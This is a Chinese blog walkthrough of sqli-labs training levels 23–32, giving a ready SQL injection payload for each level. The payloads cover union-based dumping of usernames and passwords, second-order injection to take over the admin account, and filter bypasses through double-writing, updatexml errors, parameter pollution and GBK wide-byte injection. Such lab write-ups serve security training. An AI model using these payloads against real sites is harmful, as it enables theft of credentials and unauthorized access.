首页 > 数据库 >sqli靶场通关流程23~32关

sqli靶场通关流程23~32关

时间:2023-10-17 16:13:17浏览次数:29  
标签:group 23 union 32 sqli select 输入 id concat

sqli靶场通关流程23~32关

Less-23 GET - Error based - strip comments (基于错误的,过滤注释的GET型)

首先,我们通过输入1’ union select 1,2,database()--+发现结尾提示少了一个单引号

我们再尝试输入联合查询语句?id=' union select 1,2,database() ' 看看能不能爆库,发现直接爆出来了

接下来我们爆表,输入?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '

接下来我们爆列名,输入?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '

接下来我们爆值,输入?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections *Real treat* -Store Injections (二次注入)

先打开页面,看到一个登陆界面,此时我们就要想到要越权登录到admin的账号

这里我们先新建一个admin’#的账号并且登录,这里我们可以尝试输入admin的账号,并把admin账号的密码改为123456

使用刚刚修改的密码登陆成功

Less-25 GET Error based - All your OR & AND belong to us -string single quote(过滤了or和and)

先输入?id=-1' union select 1,2,database()--+ 发现注入成功

直接使用poc构造爆值语句,输入?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+ 发现报错了,并且报错信息中,password回显少了or两个字母,此时灵机一动,咱们可以双写来绕过检测

稍作修改,输入?id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users--+

发现果然爆值成功

Less-26 GET - Error based - All your SPACES and COMMENTS belong to us

此题令我绞尽脑汁,一直没法解决问题,直到我查看源码,才知道注释符以及空格给过滤了,我们需要使用单引号进行闭合,双写绕过逻辑运算符或者使用&&和||替换,方法是直接输入?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0

成功后,我们直接输入

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0 爆值

Less-27 GET Error Based- All your UNION & SELECT Belong to us - String - Single quote

看标题,这关很明显就是union和select被过滤了,我们只能大小写绕过或者复写绕过,直接输入

?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0 爆值

Less-29 GET -Error based- IMPIDENCE MISMATCH- Having a WAF in front of web application

发现直接输入

?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+

直接爆值成功

Less-30 GET BLIND - IMPIDENCE MISMATCH- Having a WAF in front of web application

这关存在空格和字符检测,直接换成

?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

爆值成功

Less-31 GET - BLIND -IMPIDENCE MISMATCH- Having a WAF in front of web application

和第30关差不多,只是多了一个括号

直接输入

?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+ 爆值

Less-32 GET - Bypass custom filter adding slashes to dangerous chars

第三十二关使用preg_replace函数将 斜杠,单引号和双引号过滤了,如果输入id=1"会变成id=1\",使得引号不起作用,但是可以注意到数据库使用了gbk编码。这里我们可以采用宽字节注入。当某字符的大小为一个字节时,称其字符为窄字节当某字符的大小为两个字节时,称其字符为宽字节。所有英文默认占一个字节,汉字占两个字节

我们直接输入

?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+ 爆值

编写人:Kevin 2023.10.17

标签:group,23,union,32,sqli,select,输入,id,concat
From: https://www.cnblogs.com/fitfit/p/17769937.html

相关文章

  • 23 组件的注册方式
    组件的注册方式:就是组件的引入方式不推荐全局,还得是局部全局,局部:作用域不同全局注册:main.js多次使用的组件就不需要重复麻烦地导入局部注册:就是之前的三步走引入......
  • Windows Server 2016 OVF, updated Oct 2023 (sysin) - VMware 虚拟机模板
    WindowsServer2016OVF,updatedOct2023(sysin)-VMware虚拟机模板2023年10月版本更新,现在自动运行sysprep,支持ESXiHostClient部署请访问原文链接:https://sysin.org/blog/windows-server-2016-ovf/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org现在......
  • Windows Server 2019 OVF, updated Oct 2023 (sysin) - VMware 虚拟机模板
    WindowsServer2019OVF,updatedOct2023(sysin)-VMware虚拟机模板2023年10月版本更新,现在自动运行sysprep,支持ESXiHostClient部署请访问原文链接:https://sysin.org/blog/windows-server-2019-ovf/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgWind......
  • Matlab 2023a 中文版 下载安装及永久激活教程!
    软件介绍:MATLABR2023a是一款由MathWorks公司开发的著名专业编程和数学计算软件,为用户提供了一个高效、灵活和易用的环境,用于进行数值计算、数据可视化、算法开发、数据分析等任务。 安装和使用教程:1.通过文章末尾处下载软件后,选中下载的【Matlab2023a】压缩包,右击选择解压到【Ma......
  • 通知|2023年8月PMP认证考试成绩公布啦!
    2023年8月PMP®、PMI-ACP®、PMI-PBA®、PgMP®考试终于公布啦! 从2023年10月16日(美国东部时间)开始,2023年8月中国大陆考试的成绩将于大约一周内上传到PMI网站! 成绩是分批出的,如果暂时没查到成绩的同学请耐心等待,预计一周内成绩会全部出来。  如何查询考试成绩?1、收到PMI邮件提......
  • 2023年下半年软考考前注意事项!一定要看!
    2023年下半年软考将于11月4-5日开考,由于首次实行机考,开考批次划分各地可能不同,所以具体考试时间请以准考证为准,请考生尽早打印准考证,了解考试时间、地点、考场规则等具体要求。  1、准考证打印时间虽然大部分地区准考证打印时间在报名通知中有公布,但是由于实行机考,考试批次划分等......
  • 【GJOI 2023.10.17 T4】 莫队
    莫队今天,接触信息学不久的小A刚刚学习了莫队。莫队可以解决一类难以合并,但方便插入的信息维护。比如,给定一个序列,支持单点修改,每次询问一个区间出现了多少种数字。再比如,给定一个序列,支持单点修改,每次询问区间众数。诸如此类。小A觉得这样的情况太平凡了。于是,他定义了一个......
  • 2023/10/17 学习笔记
    传输层协议tcp/udp协议TCP/IP协议族的传输层协议tcp特性1.工作在传输层2.面向连接协议3.全双工协议4.半关闭(四次挥手)5.错误检查6.将数据打包成段,排序(分片)7.确认机制8.数据恢复,重传9.流量控制,滑动窗口udp特性工作在传输层提供不可靠的网络访问非面向连接协......
  • 【NSSCTF逆向】【2023题目】《润!》
    题目解法这道题蛮搞的,不算简单。刚开始拿到这道题运行一下有些信息,是一道迷宫题,可能flag是我们输入的路线吧?先拿exeinfo来看看告诉我有壳,但是不要用upx-d来脱壳,结合题目的标签,知道这题有一个魔改upx壳。硬脱不行。说实话我对upx的了解很皮毛,网上搜了搜upx壳的详细源......
  • 武汉大学2023年新生程序设计竞赛
    A-教科书般的亵渎#include<bits/stdc++.h>usingnamespacestd;#defineintlonglongusingvi=vector<int>;usingpii=pair<int,int>;usingi32=int32_t;int32_tmain(){intn;cin>>n;via(n);for(auto&i:......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99